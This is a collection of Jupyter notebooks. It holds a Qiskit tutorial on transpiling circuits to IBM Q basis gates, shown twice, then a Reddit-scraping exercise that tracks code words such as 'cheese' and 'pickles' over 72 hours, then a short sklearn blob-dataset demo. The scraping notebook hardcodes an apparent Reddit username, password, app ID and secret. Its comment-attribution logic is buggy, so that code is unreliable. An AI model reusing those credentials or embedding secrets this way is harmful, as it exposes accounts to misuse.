Core Steps in Circuit Rewriting As we will see, rewriting quantum circuits to match hardware constraints and optimize for performance can be far from trivial. The flow of logic in the rewriting tool chain need not be linear, and can often have iterative sub-loops, conditional branches, and other complex behaviors. That being said, the basic building blocks follow the structure given below.  Our goal in this section is to see what each of these "passes" does at a high-level, and then begin exploring their usage on a set of common circuits. Unrolling to Basis Gates When writing a quantum circuit you are free to use any quantum gate (unitary operator) that you like, along with a collection of non-gate operations such as qubit measurements and reset operations. However, when running a circuit on a real quantum device one no longer has this flexibility. Due to limitations in, for example, the physical interactions between qubits, difficulty in implementing multi-qubit gates, control electronics etc, a quantum computing device can only natively support a handful of quantum gates and non-gate operations. In the present case of IBM Q devices, the native gate set can be found by querying the devices themselves:
###Code
provider = IBMQ.get_provider(group='open')
provider.backends(simulator=False)
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 5 and not x.configuration().simulator and x.status().operational==True))
backend.configuration().basis_gates
###Output
_____no_output_____
###Markdown
We see that our device supports five native gates: four single-qubit gates (`u1`, `u2`, `u3`, and `id`) and one two-qubit entangling gate `cx`. In addition, the device supports qubit measurements (otherwise we cannot read out an answer!). Although we have queried only a single device, all IBM Q devices support this gate set. The `u*` gates represent arbitrary single-qubit rotations of one, two, and three angles. The `u1` gates are single-parameter rotations that represent generalized phase gates of the form $$U_{1}(\lambda) = \begin{bmatrix}1 & 0 \\0 & e^{i\lambda}\end{bmatrix}$$ This set includes common gates such as $Z$, $T$, $T^{\dagger}$, $S$, and $S^{\dagger}$. It turns out that these gates do not actually need to be performed on hardware, but instead, can be implemented in software as "virtual gates". These virtual gates are called "frame changes" and take zero time, and have no associated error; they are free gates on hardware. Two-angle rotations, $U_{2}(\phi,\lambda)$, are actually two frame changes with a single $X_{\pi/2}$ gate in between them, and can be used to synthesize gates like the Hadamard ($U_{2}(0,\pi)$) gate. As the only actual gate performed is the $X_{\pi/2}$ gate, the error and gate time associated with any $U_{2}$ gate is the same as an $X_{\pi/2}$ gate. Similarly, $U_{3}(\theta,\phi,\lambda)$ gates are formed from three frame changes with two $X_{\pi/2}$ gates in between them. The errors and gate times are twice those of a single $X_{\pi/2}$. The identity gate, $id$, is straightforward, and is a placeholder gate with a fixed time interval. The only entangling gate supported by the IBM Q devices is the CNOT gate (`cx`) that, in the computational basis, can be written as: $$\mathrm{CNOT}(0,1) = \begin{bmatrix}1 & 0 & 0 & 0 \\0 & 0 & 0 & 1 \\0 & 0 & 1 & 0 \\0 & 1 & 0 & 0\end{bmatrix},$$ where we see that the matrix form follows from the specific bit-ordering convention used in Qiskit. Every quantum circuit run on an IBM Q device must be expressed using only these basis gates. For example, suppose one wants to run a simple phase estimation circuit:
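Before building it, here is a small numerical aside (a sketch in plain NumPy, independent of the device query above) confirming that the $U_{1}$ family really does contain $Z$, $S$, and $T$ as special cases:
###Code
# U1(lambda) as an explicit 2x2 matrix
def u1_matrix(lam):
    return np.array([[1, 0], [0, np.exp(1j * lam)]])

Z = np.diag([1, -1])
S = np.diag([1, 1j])
T = np.diag([1, np.exp(1j * np.pi / 4)])

print(np.allclose(u1_matrix(np.pi), Z))      # Z = U1(pi)
print(np.allclose(u1_matrix(np.pi / 2), S))  # S = U1(pi/2)
print(np.allclose(u1_matrix(np.pi / 4), T))  # T = U1(pi/4)
###Output
_____no_output_____
###Markdown
With the basis gates in hand, here is the phase estimation circuit mentioned above: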
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.x(qr[1])
qc.cu1(np.pi/4, qr[0], qr[1])
qc.h(qr[0])
qc.measure(qr[0], cr[0])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
We have $H$, $X$, and controlled-$U_{1}$ gates, none of which are in our device's basis gate set, so they must be expanded. We will see that this expansion is taken care of for you, but for now let us just rewrite the circuit in the basis gate set by hand:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc_basis = QuantumCircuit(qr, cr)
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
# X gate in U3 format
qc_basis.u3(np.pi, 0, np.pi, qr[1])
# Decomposition for controlled-U1 with lambda=pi/4
qc_basis.u1(np.pi/8, qr[0])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(-np.pi/8, qr[1])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/8, qr[1])
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
qc_basis.measure(qr[0], cr[0])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
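###Markdown
In practice nobody performs this rewriting by hand; the transpiler's unrolling pass does it automatically. The cell below is a sketch (assuming the `qc` defined above) that should produce a circuit equivalent to the hand-written one, with gate counts that may differ slightly between Qiskit versions:
###Code
from qiskit.compiler import transpile
qc_auto = transpile(qc, basis_gates=['u1', 'u2', 'u3', 'id', 'cx'], optimization_level=0)
print(qc_auto.count_ops())
qc_auto.draw(output='mpl')
###Output
_____no_output_____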
###Markdown
There are a few things to highlight. First, the circuit has gotten longer than the initial one. This can be verified by checking the depth of the two circuits:
###Code
print(qc.depth(), ',', qc_basis.depth())
###Output
4 , 7
###Markdown
Second, although we had a single controlled gate, the fact that it was not in the basis set means that, when expanded, it requires more than a single `cx` gate to implement. All said, unrolling to the basis set of gates leads to an increase in the length of a quantum circuit and the number of gates. Both of these increases lead to more errors from the environment and gate errors, respectively, and further circuit rewriting steps must try to mitigate this effect through circuit optimizations. Finally, we will look at the particularly important example of a Toffoli, or controlled-controlled-not gate:
###Code
qr = QuantumRegister(3, 'q')
qc = QuantumCircuit(qr)
qc.ccx(qr[0], qr[1], qr[2])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
As a three-qubit gate, it should already be clear that this is not in the basis set of our devices. We have already seen that controlled gates not in the basis set are typically decomposed into multiple CNOT gates. This is doubly true for controlled gates acting on more than two qubits, where multiple CNOT gates are needed to generate the required entanglement across all of the qubits involved. In our basis set, the Toffoli gate can be written as:
###Code
qr = QuantumRegister(3, 'q')
qc_basis = QuantumCircuit(qr)
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(np.pi/4, qr[1])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.u1(np.pi/4, qr[0])
qc_basis.u1(-np.pi/4, qr[1])
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
Therefore, for every Toffoli gate in a quantum circuit, the IBM Q hardware must execute six CNOT gates and a handful of single-qubit gates. From this example, it should be clear that any algorithm that makes use of multiple Toffoli gates will end up as a circuit with large depth and will therefore be appreciably affected by noise and gate errors. Initial Layout
###Code
qr = QuantumRegister(5, 'q')
cr = ClassicalRegister(5, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.cx(qr[0], qr[4])
qc.cx(qr[4], qr[3])
qc.cx(qr[3], qr[1])
qc.cx(qr[1], qr[2])
qc.draw(output='mpl')
from qiskit.visualization.gate_map import plot_gate_map
plot_gate_map(backend, plot_directed=True)
import qiskit
qiskit.__qiskit_version__
###Output
_____no_output_____
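###Markdown
A natural follow-up (a sketch, assuming the `qc` and `backend` objects from the cells above) is to let the transpiler pick a layout itself and then visualize where each virtual qubit landed on the device:
###Code
from qiskit.compiler import transpile
from qiskit.visualization import plot_circuit_layout
qc_t = transpile(qc, backend)
plot_circuit_layout(qc_t, backend)
###Output
_____no_output_____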
###Markdown
Transpiling Quantum Circuits In this chapter we will investigate how quantum circuits are transformed when run on quantum devices. That we need to modify the circuits at all is a consequence of the limitations of current quantum computing hardware. Namely, the limited connectivity inherent in most quantum hardware, restricted gate sets, as well as environmental noise and gate errors, all conspire to limit the effective computational power on today's quantum devices. Fortunately, quantum circuit rewriting tool chains have been developed that directly address these issues, and return heavily optimized circuits mapped to targeted quantum devices. Here we will explore the IBM Qiskit 'transpiler' circuit rewriting framework.
###Code
import numpy as np
from qiskit import *
from qiskit.tools.jupyter import *
from qiskit.providers.ibmq import least_busy
%matplotlib inline
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
IBMQ.load_account()
###Output
_____no_output_____
###Markdown
Core Steps in Circuit Rewriting As we will see, rewriting quantum circuits to match hardware constraints and optimize for performance can be far from trivial. The flow of logic in the rewriting tool chain need not be linear, and can often have iterative sub-loops, conditional branches, and other complex behaviors. That being said, the basic building blocks follow the structure given below.  Our goal in this section is to see what each of these "passes" does at a high-level, and then begin exploring their usage on a set of common circuits. Unrolling to Basis Gates When writing a quantum circuit you are free to use any quantum gate (unitary operator) that you like, along with a collection of non-gate operations such as qubit measurements and reset operations. However, when running a circuit on a real quantum device one no longer has this flexibility. Due to limitations in, for example, the physical interactions between qubits, difficulty in implementing multi-qubit gates, control electronics etc, a quantum computing device can only natively support a handful of quantum gates and non-gate operations. In the present case of IBM Q devices, the native gate set can be found by querying the devices themselves:
###Code
provider = IBMQ.get_provider(group='open')
provider.backends(simulator=False)
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 5 and not x.configuration().simulator and x.status().operational==True))
backend.configuration().basis_gates
###Output
_____no_output_____
###Markdown
We see that our device supports five native gates: four single-qubit gates (`u1`, `u2`, `u3`, and `id`) and one two-qubit entangling gate `cx`. In addition, the device supports qubit measurements (otherwise we cannot read out an answer!). Although we have queried only a single device, all IBM Q devices support this gate set. The `u*` gates represent arbitrary single-qubit rotations of one, two, and three angles. The `u1` gates are single-parameter rotations that represent generalized phase gates of the form $$U_{1}(\lambda) = \begin{bmatrix}1 & 0 \\0 & e^{i\lambda}\end{bmatrix}$$ This set includes common gates such as $Z$, $T$, $T^{\dagger}$, $S$, and $S^{\dagger}$. It turns out that these gates do not actually need to be performed on hardware, but instead, can be implemented in software as "virtual gates". These virtual gates are called "frame changes" and take zero time, and have no associated error; they are free gates on hardware. Two-angle rotations, $U_{2}(\phi,\lambda)$, are actually two frame changes with a single $X_{\pi/2}$ gate in between them, and can be used to synthesize gates like the Hadamard ($U_{2}(0,\pi)$) gate. As the only actual gate performed is the $X_{\pi/2}$ gate, the error and gate time associated with any $U_{2}$ gate is the same as an $X_{\pi/2}$ gate. Similarly, $U_{3}(\theta,\phi,\lambda)$ gates are formed from three frame changes with two $X_{\pi/2}$ gates in between them. The errors and gate times are twice those of a single $X_{\pi/2}$. The identity gate, $id$, is straightforward, and is a placeholder gate with a fixed time interval. The only entangling gate supported by the IBM Q devices is the CNOT gate (`cx`) that, in the computational basis, can be written as: $$\mathrm{CNOT}(0,1) = \begin{bmatrix}1 & 0 & 0 & 0 \\0 & 0 & 0 & 1 \\0 & 0 & 1 & 0 \\0 & 1 & 0 & 0\end{bmatrix},$$ where we see that the matrix form follows from the specific bit-ordering convention used in Qiskit. Every quantum circuit run on an IBM Q device must be expressed using only these basis gates. For example, suppose one wants to run a simple phase estimation circuit:
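As a small aside (a sketch using `qiskit.quantum_info`, assuming the imports above), the bit-ordering convention behind that CNOT matrix can be checked directly by inspecting the unitary of a bare `cx`:
###Code
from qiskit.quantum_info import Operator
chk = QuantumCircuit(2)
chk.cx(0, 1)
# real part as integers; should match the matrix quoted in the text
print(np.real(Operator(chk).data).astype(int))
###Output
_____no_output_____
###Markdown
With the conventions settled, the phase estimation circuit is: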
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.x(qr[1])
qc.cp(np.pi/4, qr[0], qr[1])
qc.h(qr[0])
qc.measure(qr[0], cr[0])
qc.draw()
###Output
_____no_output_____
###Markdown
We have $H$, $X$, and controlled-$U_{1}$ gates, none of which are in our device's basis gate set, so they must be expanded. We will see that this expansion is taken care of for you, but for now let us just rewrite the circuit in the basis gate set by hand:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc_basis = QuantumCircuit(qr, cr)
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
# X gate in U3 format
qc_basis.u3(np.pi, 0, np.pi, qr[1])
# Decomposition for controlled-phase with lambda=pi/4
qc_basis.p(np.pi/8, qr[0])
qc_basis.cx(qr[0], qr[1])
qc_basis.p(-np.pi/8, qr[1])
qc_basis.cx(qr[0], qr[1])
qc_basis.p(np.pi/8, qr[1])
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
qc_basis.measure(qr[0], cr[0])
qc_basis.draw()
###Output
_____no_output_____
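###Markdown
The same rewriting can also be requested at different optimization levels, which trade compilation time for (potentially) shorter circuits. A sketch (assuming the `qc` and `backend` objects above; the exact numbers depend on the device and Qiskit version):
###Code
from qiskit.compiler import transpile
for level in range(4):
    tqc = transpile(qc, backend, optimization_level=level)
    print(level, 'depth =', tqc.depth(), tqc.count_ops())
###Output
_____no_output_____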
###Markdown
There are a few things to highlight. First, the circuit has gotten longer than the initial one. This can be verified by checking the depth of the two circuits:
###Code
print(qc.depth(), ',', qc_basis.depth())
###Output
4 , 7
###Markdown
Second, although we had a single controlled gate, the fact that it was not in the basis set means that, when expanded, it requires more than a single `cx` gate to implement. All said, unrolling to the basis set of gates leads to an increase in the length of a quantum circuit and the number of gates. Both of these increases lead to more errors from the environment and gate errors, respectively, and further circuit rewriting steps must try to mitigate this effect through circuit optimizations. Finally, we will look at the particularly important example of a Toffoli, or controlled-controlled-not gate:
###Code
qr = QuantumRegister(3, 'q')
qc = QuantumCircuit(qr)
qc.ccx(qr[0], qr[1], qr[2])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
As a three-qubit gate, it should already be clear that this is not in the basis set of our devices. We have already seen that controlled gates not in the basis set are typically decomposed into multiple CNOT gates. This is doubly true for controlled gates acting on more than two qubits, where multiple CNOT gates are needed to generate the required entanglement across all of the qubits involved. In our basis set, the Toffoli gate can be written as:
###Code
qr = QuantumRegister(3, 'q')
qc_basis = QuantumCircuit(qr)
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.p(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.p(np.pi/4, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.p(np.pi/4, qr[1])
qc_basis.p(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.p(np.pi/4, qr[2])
qc_basis.p(np.pi/4, qr[0])
qc_basis.p(-np.pi/4, qr[1])
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.draw()
###Output
_____no_output_____
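###Markdown
Equivalently, one can hand the bare `ccx` circuit straight to the transpiler and count the two-qubit gates it emits; a sketch (assuming the `qc` and `backend` objects above), noting that the `cx` count can exceed six if the chosen physical qubits are not directly connected:
###Code
from qiskit.compiler import transpile
qc_hw = transpile(qc, backend)
print(qc_hw.count_ops())
###Output
_____no_output_____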
###Markdown
Therefore, for every Toffoli gate in a quantum circuit, the IBM Q hardware must execute six CNOT gates and a handful of single-qubit gates. From this example, it should be clear that any algorithm that makes use of multiple Toffoli gates will end up as a circuit with large depth and will therefore be appreciably affected by noise and gate errors. Initial Layout
###Code
qr = QuantumRegister(5, 'q')
cr = ClassicalRegister(5, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.cx(qr[0], qr[4])
qc.cx(qr[4], qr[3])
qc.cx(qr[3], qr[1])
qc.cx(qr[1], qr[2])
qc.draw(output='mpl')
from qiskit.visualization.gate_map import plot_gate_map
plot_gate_map(backend, plot_directed=True)
import qiskit
qiskit.__qiskit_version__
###Output
_____no_output_____ |
Modone.ipynb | ###Markdown
The FBI is tracking a potential smuggling ring led by a shady character known by the nom de guerre of The Hamburgler, who is using social media platforms to help organize her or his efforts. Your mission, should you choose to accept it, is to create a system that uses the APIs of various services to trace comments made over the last 72 hours that mention the terms he is using as cover: cheese (payments), pickles (firearms), buns (identity covers), meat (targets), and sesame (keys). We need your help tracking this person and any associates who may use these terms on social media. Write a Python script that draws data from a subreddit (or from multiple subreddits, or from all subreddits) and stores it as a CSV. Think about the kinds of questions you might be able to address using data from Reddit. I was looking at /r/Phoenix because I wanted to extract place-based comments and learn from them. Here you are looking for particular keywords within a particular timeframe. Design an extractor that does this, and also saves the dates and times of these comments in a human-readable format. It should also only collect the last 72 hours' worth of data.
###Code
!pip install praw
!pip install pytz # suggested to use because kept getting tzinfo error when importing datetime. this will specify pacific timezone
import praw
import time
from time import sleep # importing to slow down execution
import datetime
from datetime import datetime
from datetime import timedelta
from praw.reddit import Submission # colab suggested this
from praw.models.reddit.comment import Comment # colab suggested this
###Output
_____no_output_____
###Markdown
2. enter login and script info for reddit
###Code
usr_name = "nunya_9911"
usr_password = "disposablepassword123!"
reddit_app_id = '0Fss0e88a5UL1dWmgk2vug'
reddit_app_secret = 'AmCxyt0gEFlMe6r2TDs6ILzQfZI5Eg'
reddit = praw.Reddit(user_agent="Mod 1 (by u/nunya_9911)",
client_id=reddit_app_id, client_secret=reddit_app_secret,
# added the check for async as colab suggested I do so.
username=usr_name, password=usr_password,check_for_async=False)
# defines which subreddit we will be looking in. No preference so to subreddit so put 'all'
subreddit = reddit.subreddit('all')
###Output
_____no_output_____
###Markdown
**This is an explanation of how to use search.** It is copied from the floating comment when I began to type "search". I put it here so it was easy to reference while I was typing everything out.def search(query: str, sort: str='relevance', syntax: str='lucene', time_filter: str='all', **generator_kwargs: Any) ->Iterator['praw.models.Submission']Return a .ListingGenerator for items that match query.:param query: The query string to search for.:param sort: Can be one of: relevance, hot, top, new, comments. (default: relevance).:param syntax: Can be one of: cloudsearch, lucene, plain (default: lucene).:param time_filter: Can be one of: all, day, hour, month, week, year (default: all).For more information on building a search query see:https://www.reddit.com/wiki/searchFor example, to search all subreddits for praw try:
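Before the full extractor, here is a stripped-down sketch of the core idea (it assumes the `reddit` and `subreddit` objects created above): search for a single keyword and keep only results newer than a cutoff computed with `timedelta`:
###Code
from datetime import datetime, timedelta

cutoff = datetime.timestamp(datetime.now() - timedelta(hours=72))
for post in subreddit.search("cheese", sort='new', time_filter='week'):
    if post.created_utc >= cutoff:
        print(post.id, post.title)
###Output
_____no_output_____
###Markdown
The full version below extends this to all of the code words and writes both submissions and their comments to a CSV file: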
###Code
# this labels the current date so I can use it later
rightnow = datetime.now()
# per the reading about time. the reading said to enter datetime.datetime.timedelta, but that didn't work.
# did this instead. not sure if Python updated since the reading was published?
delta = timedelta(hours=72)
# this defines the time 3 days ago and converts it from datetime.datetime to a float
the_last_seventytwo_hours = datetime.timestamp(rightnow - delta)
with open("moduleone_missionhamburgler.csv", 'w') as subfile:
# creating an empty list so I can add things to it
list_of_found_codenames = []
# so reddit doesn't get mad at me
sleep(2)
# in all subreddits, I am searching for submissions that includes the Hamburgler's cover names
for submission in subreddit.search("cheese, bun, meat, pickle, sesame",'new','lucene','week'):
# while completing the for loop above, it is going to make sure the submissions were made in the last 3 days
if submission.created_utc >= the_last_seventytwo_hours:
sleep(4)
# adding the submissions from the for loop to the list
list_of_found_codenames.append(submission.id)
sleep(4)
# this for loop will help format the submissions I added to the list
for eachtopic in list_of_found_codenames:
submission = reddit.submission(eachtopic)
# making sure reddit doesn't get mad. better safe than sorry :)
sleep(4)
# this formats all the submissions so it is easy to read
format = '*' + eachtopic + '* "'
format += submission.title + '", written by '
format += submission.author.name + '. @ '
format += datetime.strftime(datetime.fromtimestamp(submission.created_utc), ' %A, %B %d, %Y') + '.\n'
# add everything we formatted to the subfile
subfile.write(format)
# making sure that it pulls all the comments from reddit by bypassing the "more" button
submission.comments.replace_more(limit=None)
commentlist = submission.comments.list()
sleep(4)
# opening the file again to add/append the found comments to list
with open("moduleone_missionhamburgler.csv", 'a') as subfile:
# same as what I did for the submissions.
for eachcomment in commentlist:
sleep(2)
format = str(eachcomment) + ','
format += eachcomment.body.replace('\n', '/') + ','
format += submission.author.name + ','
format += datetime.strftime(datetime.fromtimestamp(submission.created_utc), ' %A, %B %d, %Y') + ','
subfile.write(format)
###Output
_____no_output_____ |
sklearn.datasets_create_two_datasets_blobs.ipynb | ###Markdown
import everything
###Code
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from keras.models import Sequential
from keras.layers import Dense
from sklearn.datasets import make_blobs
%matplotlib inline
matplotlib.rcParams['figure.figsize'] = (10.0, 8.0)
#data, label = make_moons(n_samples=500, noise=0.2, random_state=0)
#label = label.reshape(500, 1)
data, label = make_blobs(n_samples=500, centers=2)
print('data shape :', data.shape)
print(data[:5], '\n')
print('label shape:', label.shape)
print(label[:5])
# scatter plot of the 500 generated samples, colored by their blob label
plt.scatter(data[:, 0], data[:, 1], s=40, c=label, cmap=plt.cm.Accent)
###Output
_____no_output_____ |